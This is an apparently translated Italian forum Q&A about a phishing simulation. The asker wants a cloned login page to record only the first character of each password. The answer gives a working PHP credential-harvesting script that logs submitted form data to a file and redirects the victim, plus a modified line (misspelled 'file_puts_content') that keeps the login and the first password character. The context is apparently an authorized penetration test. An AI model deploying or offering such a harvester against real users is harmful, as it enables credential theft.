Sto lanciando una campagna di spear phishing e il mio cliente mi ha specificamente chiesto di raccogliere solo il primo carattere della password, c'è un modo per farlo?
Sostanzialmente invece di mostrare l'intera password quando un utente inserirà il suo, voglio che appaia solo il primo carattere.
Altrimenti, è possibile produrre un hashing quando la password viene inviata al server Apache?
Se stai usando l'opzione a cui sto pensando, la tua forma clonata è POST di post.php. Puoi modificare lo script per farlo fare ciò che desideri.
<?php
$file = 'harvester_sdfskksdks.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>
<meta http-equiv="refresh" content="0; url=http://0.0.0.0:8000/index.html" />
Invece di scrivere tutti $ var, basta fare
file_puts_content($file, $_POST['login'] . ':' . substr($_POST['password'], 0, 1), FILE_APPEND)
Leggi altre domande sui tag passwords hash kali-linux metasploit